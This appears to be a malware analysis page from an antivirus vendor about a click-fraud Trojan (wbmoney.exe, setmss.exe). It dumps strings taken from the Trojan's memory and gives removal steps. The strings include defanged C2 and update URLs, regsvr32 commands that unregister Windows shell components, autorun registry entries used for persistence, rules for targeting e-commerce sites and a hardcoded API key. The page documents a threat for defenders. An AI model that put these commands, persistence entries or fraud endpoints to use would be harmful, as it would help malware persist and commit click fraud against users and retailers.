CMDIClientAreaWnd
%sMDIClientArea-%d
%sPane-%d%x
%sPane-%d
%sBasePane-%d%x
%sBasePane-%d
windows
ShowCmd
%c%d%c%s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
RGB(%d, %d, %d)
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
d:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
%s (%s:%d)
inflate 1.2.7 Copyright 1995-2012 Mark Adler
deflate 1.2.7 Copyright 1995-2012 Jean-loup Gailly and Mark Adler
1.2.7
<4,$?7/'
(3-!0,1'8"5.*2$
%sX
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js
&ip=%s
hXXp://ip.taobao.com/service/getIpInfo.php?ip=%s
hXXp://apis.baidu.com/apistore/iplookupservice/iplookup?ip=%s
apikey: a97c11bc9aa6b786403a2fa84a1cdcf4
hXXp://VVV.ip.cn/
hXXp://ip.chinaz.com/getip.aspx
hXXp://1212.ip138.com/ic.asp
hXXp://ip-api.com/json
xxxxxx
\\.\PhysicalDrive%d
%d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE
%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)
%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d
%d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE
%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
\\.\Scsi%d:
hXXp://VVV.baidu.com/
https
%s=%s
hXXps://
var el = document.getElementById('%s');
if (document.createEvent) {
var evt = document.createEvent('MouseEvents');
evt.initMouseEvent('%s', true, true, window,
el.dispatchEvent(evt);
} else if (el.fireEvent) {
el.fireEvent('on%s');
<a href="%s" target="%s">%s</a>
onkeydown
DSound.dll
winmm.dll
%s\%s
%s^%s
"%s" "%s" "wait=%d"
ttliuliang.com
ttsoft.cn
softfw.com
hXXp://%s.%s/
d:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl
update.txt
1_0_%s.zip
%s_old
rnd=%d
[%d]%s
%s:%u
%s.log
%s_dddddd.log
{X-X-X-XX-XXXXXX}
---------------------------%s
Content-Type: multipart/form-data; boundary=%s
Content-Type: application/x-www-form-urlencoded
%s: %s
Content-Disposition: form-data; name="%s"
[%u]%s
desktop.ini
container.dat
index.dat
wininet.dll
hXXps://amos.im.alisoft.com/msg.aw?
hXXps://amos.alicdn.com/getcid.aw?
hXXps://VVV.taobao.com/webww
hXXps://amos1.taobao.com
hXXp://amos.im.alisoft.com/msg.aw?
hXXp://amos.alicdn.com/getcid.aw?
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
%dd
http:
.com.cn
.net.cn
.org.cn
.gov.cn
%d.%d.%d.%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%Y-%m-%d %H:%M:%S
%Y-%m-%d
item.taobao.com
detail.tmall.com
1007.13066.
%d/%d
taobao.com
login.taobao.com
VVV.taobao.com/
VVV.taobao.com
s.taobao.com/
s.taobao.com
history.replaceState({}, null, '%s');
{%s-%d-%d-%d-%d-%s-%s}
%s%s=
UseSQLAPI
VVV.meilishuo.com/share/item/
meilishuo.com
shop.mogujie.com/detail/
mogujie.com
product.dangdang.com/
dangdang.com
item.gome.com.cn/
gome.com.cn
product.suning.com/
suning.com
item.yhd.com/item/
yhd.com
item.m.jd.com/
item.jd.com/
jd.com
auction1.paipai.com/
item.wanggou.com/
paipai.com
m.1688.com/offer/
detail.china.alibaba.com/offer/
detail.1688.com/offer/
1688.com
detail.yao.95095.com/item.htm?
yao.95095.com
detail.m.tmall.com/item.htm?
tmall.com
h5.m.taobao.com/awp/core/detail.htm?
ju.mmstat.com/?url=hXXps://item.taobao.com/item.htm?
ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
detail.tmall.com/item.htm?
item.taobao.com/item.htm?
hXXps://detail.1688.com/offer/534384293449.html
hXXp://s.m.taobao.com/h5?q=Wap金牌软件&search-bton=&event_submit_do_new_search_auction=1&_input_charset=utf-8&topSearch=1&atype=b&searchfrom=1&action=home:redirect_app_action&from=1&ttid=
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25
hXXps://m.taobao.com/
hXXp://item.m.jd.com/product/10355154117.html
hXXp://m.jd.com/ware/search.action?sid=&keyword=运动护具&catelogyList=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1535.3 Safari/537.36
hXXps://VVV.taobao.com/
%s`;`&`
|^any^include^%s
%s_%s_%d_%d
item.taobao.com/auction/noitem.htm?
mdetail.tmall.com/mobile/notfound.htm
h5.m.taobao.com/detailplugin/expired.html?
detail.m.tmall.com/
tmall.com-
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
%s\Cookies
%s\Cache
ttworker%d
%s; PATH=/; DOMAIN=.%s
|^href^prefix^hXXp://auction1.paipai.com/
|^href^prefix^hXXp://c.express.paipai.com/exp_click.fcg?
|^href^prefix^hXXp://item.wanggou.com/^,^|^href^prefix^hXXp://auction1.paipai.com/
|^href^prefix^hXXp://s.paipai.com/^,^&^text^whole^
KeyWord
hXXp://VVV.paipai.com/
|^href^prefix^hXXp://click.p4p.1688.com/ci_bb?
|^href^prefix^hXXp://s.1688.com/selloffer/^,^&^text^whole^
keywords
hXXp://VVV.1688.com/
|^href^prefix^hXXp://detail.tmall.com/item.htm?
|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@
|^href^prefix^hXXp://list.tmall.com/search_product.htm?^,^&^text^whole^
hXXp://VVV.tmall.com/
|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^|^href^prefix^hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?^,^|^text^whole^
|^href^prefix^hXXp://click.simba.taobao.com/cc_im?
|^href^prefix^hXXp://item.taobao.com/item.htm?^,^|^href^prefix^hXXp://detail.tmall.com/item.htm?^,^&^href^include^id=<@
|^href^prefix^hXXp://s.taobao.com/search?^,^&^text^whole^
hXXp://VVV.taobao.com/
|^href^prefix^hXXp://cn.bing.com/search?q=^,^&^text^whole^
hXXp://cn.bing.com/
|^href^prefix^hXXp://VVV.sogou.com/bill_cpc?
|^href^prefix^hXXp://VVV.soso.com/q?query=^,^&^text^whole^
hXXp://VVV.soso.com/
|^href^prefix^hXXp://e.tf.360.cn/search/eclk?
|^href^prefix^hXXp://VVV.so.com/s?^,^&^text^whole^
hXXp://VVV.so.com/
|^href^prefix^hXXp://VVV.baidu.com/baidu.php?url=
|^href^prefix^hXXp://VVV.baidu.com/link?url=
|^href^prefix^hXXp://VVV.baidu.com/s?wd=^,^&^text^whole^
SHELL32.DLL
ZwQueryValueKey
NTDLL.DLL
WININET.DLL
KERNEL32.DLL
WININET.dll
SHELL32.dll
KERNEL32.dll
NTDLL.dll
%s\vest%d
%s\History
hXXp://sss12.banjia.la/ServerAPI.ashx?ation=ip&key=eGhkZmVlZGJhY2sInste&num=100
%s|%s|%s
[%d][%X]
[%u - %u]
ttbrowser.exe
TASKID_%d
ITEMID_%s
SHOPID_%s
IP[%s]
regsvr32 /s jscript.dll
regsvr32 /u /s wshom.ocx
regsvr32 /u /s wshext.dll
regsvr32 /u /s shell32.dll
OBJ:%s
[%d,%d]
%d%s%s%s%s
%d%s%d%s%d%s%d%s%s%s%d
%d%s%s
%s%s%s%s
%s%d%s%d
login2[MAN].m.[TTSOFT]
login1[MAN].m.[TTSOFT]
login[MAN].m.[TTSOFT]
?act=%s&hostid=%s&clntid=%s&ver=%d&isclnt=1&r=%s
&mode=%d
m_sCommonAlertMsg
d:00 ~ d:00
m_sURL
m_nHourLimit
m_sShopID
hXXp://VVV.yhd.com/
hXXp://VVV.jd.com/
hXXps://VVV.tmall.com/
m_sKeyword1
m_sKeyword2
"%s" "%s"
%d%s%d%s%d%s%d%s%s%s%s
1/%d~1/%d
%d-%d
hXXp://a.m.taobao.com/i%s.htm
data-nick="
sellerNick:'
.html
%d|%d|%d
ttflow.ini
m_dwHotKey
%s%d/update/
update_stworker.txt
1.9.67
- V%s
hXXp://user.ttliuliang.com
hXXp://user.ttliuliang.com/html/notice/175.html
hXXp://user.ttliuliang.com/clnt/tips_flownews.htm
register.htm
SEOWorkApp_HOTKEY
STWorker.AppID.NoVersion
F:\Projects_New\ClickPro\proj\stuike\bin\Release\
GetCPInfo
WinExec
GetWindowsDirectoryA
PeekNamedPipe
GetProcessHeap
GetAsyncKeyState
GetKeyState
EnumChildWindows
RegisterHotKey
UnregisterHotKey
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyNameTextA
MapVirtualKeyA
CreateDialogIndirectParamA
GetKeyboardLayout
GetKeyboardState
MapVirtualKeyExA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
RegOpenKeyExW
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteA
COMCTL32.dll
UrlUnescapeA
SHLWAPI.dll
OLEAUT32.dll
oledlg.dll
URLDownloadToFileA
UrlMkSetSessionOption
urlmon.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
DeleteUrlCacheEntry
HttpQueryInfoA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpSendRequestA
HttpOpenRequestA
WINMM.dll
imagehlp.dll
VERSION.dll
OLEACC.dll
IMM32.dll
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AVCStatusCmdUI@@
.PAVCOleDispatchException@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMFCToolBarCmdUI@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMDIFrameWndEx@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
.?AVCCmdTarget@@
.PAVCException@@
.?AVXHttpRequest@@
.?AVXHttpRequestEx@@
.?AVXMmiHttp@@
.?AVCURLLinkButton@@
.?AVXHttpHeadData@@
.PAVCInternetException@@
.?AUIHttpSecurity@@
.?AVXHttpSecurity@CCustomControlSite@@
.?AVCMDIChildWnd@@
.?AVCHotKeyCtrl@@
.?AVCMDIFrameWnd@@
C:\Windows\Fonts\win\setmss.exe
.BEE;"
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity processorArchitecture="x86" version="5.1.0.0" type="win32" name="OceanSoftApplication"></assemblyIdentity><description>OceanSoft Application</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="x86"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>
7#8*8/888
>$?(?,?0?
3#3'3 373
7/878`8[9
11p1
3!545[5{5
=)>4>_>~>
2"2&2*2<2
=@> ?]?~?
7'747}7&8:8
3L4
11?1^1
5]5S5a5t5}5
>#?,?5?^?
;!;(;^;|;
0&0,02080
8!8%8)8-848
88K8S8\8g8v8
0 0$0(0,0004080
1 1$181<1
2 2$2(2,2024282<2@2
0004080<0
? ?$?(?,?0?4?8?<?@?
9 9$9(90989
=,=8=@=`=
8 8(808<8`8
9 9@9`9|9
= =<=@=`=
>(>0>\>|>
0 0<0\0|0
(1@1\1|1
accKeyboardShortcut
hhctrl.ocx
dwmapi.dll
UxTheme.dll
USER32.DLL
RICHED20.DLL
ekernel32.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
\StringFileInfo\xx\%s
HotKey1
STWorker.Document
(*.*)
1.0.0.1
TTWorker.exe

setmss.exe_3368_rwx_00AAB000_00001000:

diu2.iu

setmss.exe_3368_rwx_6F1F1000_00001000:

OLEUI_MSG_BROWSE_OFN
OLEUI_MSG_ADDCONTROL
OLEUI_MSG_CHANGESOURCE
OLEUI_MSG_CONVERT
OLEUI_MSG_CLOSEBUSYDIALOG
OLEUI_MSG_CHANGEICON
OLEUI_MSG_BROWSE
OLEUI_MSG_ENDDIALOG
OLEUI_MSG_HELP

wbmoney.exe_3752:

.text
`.rdata
@.data
.rsrc
(SSSSh@
L$,SSh
?456789:;<=
!"#$%&'()* ,-./0123
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
DisconnectNamedPipe
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
GetProcessWindowStation
USER32.dll
GDI32.dll
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
SHLWAPI.dll
HttpEndRequestA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
InternetOpenUrlA
WININET.dll
WS2_32.dll
VERSION.dll
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
COMCTL32.dll
ole32.dll
OLEAUT32.dll
wbmoney.exe
?classCWebBrowser2@CWebBrowser2@@2UCRuntimeClass@@B
?messageMap@CAboutDlg@@1UAFX_MSGMAP@@B
?messageMap@CAgentCustomizeDlg@@1UAFX_MSGMAP@@B
?messageMap@CGetDlg@@1UAFX_MSGMAP@@B
?messageMap@CHideWndDlg@@1UAFX_MSGMAP@@B
?messageMap@CLiuliangzbApp@@1UAFX_MSGMAP@@B
?messageMap@CLiuliangzbDlg@@1UAFX_MSGMAP@@B
?messageMap@CRegisterDlg@@1UAFX_MSGMAP@@B
?messageMap@CSettingDlg@@1UAFX_MSGMAP@@B
VVV.1688.com
{"userinput":"%s","exec":"getuserlogin"}
V1.4.8--
wbliuliang%d
parems=%s
VVV.taobao.com
TbViewer.exe
wbmoney.exe.ini
%d : %d, %d, %d, %s
task_url
o_url
dwError: %d
browser\GGtbviewerDebug.exe
%s%s %s
browser\GGtbviewer.exe
keyword
dwMemrSize : %d, dwMemorySize : %d ,S:%d
QQ.exe
.tmall.com
.taobao.com
hXXp://VVV.ip138.com
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
192.168.
hXXp://reg.4345.cc/?r=%d
hXXp://reg.2466.cc/?r=%d
hXXp://reg.3299.cc/?r=%d
u.ini
hXXp://x1.tojingjia.com/
hXXp://x1.9935.org/
hXXp://x1.wangbaoma.com/
hXXp://x1.huanips.com/
hXXp://x1.qqshuoyu.com/
hXXp://x1.2466.cc/
/ClientAPI/StatisticsUserAPI.aspx
%Y-%m-%d %H:%M:%S
HotKey
hXXp://down.9935.org/gj/ver.txt
hXXp://6688.qqshuoyu.com
hXXp://6688.huanips.com
hXXp://6688.wangbaoma.com
hXXp://6688.9935.org
hXXp://6688.tojingjia.com
hXXp://6688.6299.cc
hXXp://down.9935.org/gj/
<ureport.txt>
Email: < baweicha@foxmail.com >
{0AD5643C-D660-48A1-B7A1-FAAA5F0D91CD}
1.4.8
ureport.txt
/ClientAPI/flowtaskAPIV4.aspx
/ClientAPI/flowtaskAPIV2.aspx
/ClientAPI/flowtaskAPIV1.aspx
Launch.exe
{FBA9BEBC-C178-44BB-96AD-C2D81AC12882}
%s %s
update.zip
updatezb.exe
Config.ini
%s,%s,%s
c:\windows\
{"userinput":"%s","exec":"getuserlogin","ggtbviewerv":"%s","updatev":"%s","tbviewerv":"%s","version":"%s","src":"%s","ip":"%s"}
{"userid":"%s","username":"%s","exec":"getuserlogin"}
hXXp://VVV.4345.cc/rj/flowtips.html
hXXp://VVV.4345.cc/
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=2&uin=800039157
%d%d%d%d
loginerror
loginstatus
1.4.0.8
hXXp://u.6299.cc
{"userno":"%s","src":"%s","ip":"%s","exec":"outlogin"}
explorer.exe
kernel32.dll
@qq.com
CWebBrowser2
\\.\pipe\%s
%s:%s
Unable to GetProcessWindowStation:
right-curly-bracket
left-curly-bracket
0123456789
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
HTTP/1.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
hXXps://
hXXp://
error:%d
Mdd
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Error:%d
Host: %s
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Run
\\.\PhysicalDrive0
iphlpapi.dll
Error %d
xxxx
Incorrect key length
report
%s%.8x %.8x %.8x %.8x
%sCS=%.4x
%sEDI=%.8x
%sES=%.4x
%sEDX=%.8x
%sFS=%.4x
%sESI=%.8x
%sDS=%.4x
%sECX=%.8x
%sEBP=%.8x
%sESP=%.8x
%sSS=%.4x
%sEBX=%.8x
%sEFLGS=%.8x
%sEIP=%.8x
%sCS=%.4x
%sEAX=%.8x
\StringFileInfo\xx\FileVersion
%s%.8x
\winhlp32.exe
UxTheme.dll
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
1.1.3
%s%s%s
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:6B8FF1FAAB6811E4887EC2849E2C3581" xmpMM:DocumentID="xmp.did:6B8FF1FBAB6811E4887EC2849E2C3581"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6B8FF1F8AB6811E4887EC2849E2C3581" stRef:documentID="xmp.did:6B8FF1F9AB6811E4887EC2849E2C3581"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>7
p8<%uF
.The file (%s) aleady exists.
hXXp://VVV.4345.cc
{8856F961-340A-11D0-A96B-00C04FD705A2}
msctls_hotkey32
HotKey1
FlowSE.exe
IDS_PASSWORD_ERROR


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    wbmoney.exe:1256
    wbmoney.exe:2052
    wbmoney.exe:3752
    wbmoney.exe:3460
    %original file name%.exe:2604
    setmss.exe:644
    setmss.exe:3440
    LLVier.exe:472
    LLVier.exe:1612
    LLVier.exe:3352

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016112620161127\index.dat (16 bytes)
    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F5BEJ4YJ\flowtips[1].htm (2862 bytes)
    C:\Windows\Fonts\win\LLVier.exe (424 bytes)
    C:\Windows\wbmoney.exe (614 bytes)
    C:\Windows\LLViewer.exe (2 bytes)
    C:\Windows\Fonts\win\setmss.exe (2 bytes)
    C:\Windows\updatezb.exe (196 bytes)
    C:\Windows\Fonts\win\TTHB.bat (5 bytes)
    C:\Windows\TbViewer.exe (3 bytes)
    C:\Windows\Config.ini (155 bytes)
    C:\ .bat (113 bytes)
    C:\Windows\Fonts\win\TB.bat (223 bytes)
    C:\Windows\Alexa.dll (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_ttbrowser.exe[1].zip (1133516 bytes)
    C:\Windows\Fonts\win\1_0_ttbrowser.exe.zip (950255 bytes)
    C:\Windows\Fonts\win\update.txt (166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\update_stworker[1].txt (166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ttll\vest3368\Cookies\R2QLPNUL.txt (116 bytes)
    C:\Windows\Fonts\win\browser\QtCore4.dll (77238 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1_0_QtGui4.dll[1].zip (264629 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XDZVB81J.txt (113 bytes)
    C:\Windows\Fonts\win\1_0_browser.exe.zip (29536 bytes)
    C:\Windows\Fonts\win\1_0_QtGui4.dll.zip (227889 bytes)
    C:\Windows\Fonts\win\browser\browser.exe (10136 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1_0_browser.exe[1].zip (35992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\1_0_º£ÂíÁ÷Á¿.exe[1].zip (48658 bytes)
    C:\Windows\Fonts\win\1_0_º£ÂíÁ÷Á¿.exe.zip (44168 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\1_0_QtCore4.dll[1].zip (254212 bytes)
    C:\Windows\Fonts\win\1_0_QtCore4.dll.zip (210446 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\update_hmflower[1].txt (609 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "SEOWorker2014" = "C:\Windows\Fonts\win\setmss.exe -autorun"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "HMFlower2016" = "C:\Windows\Fonts\win\LLVier.exe -autorun"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
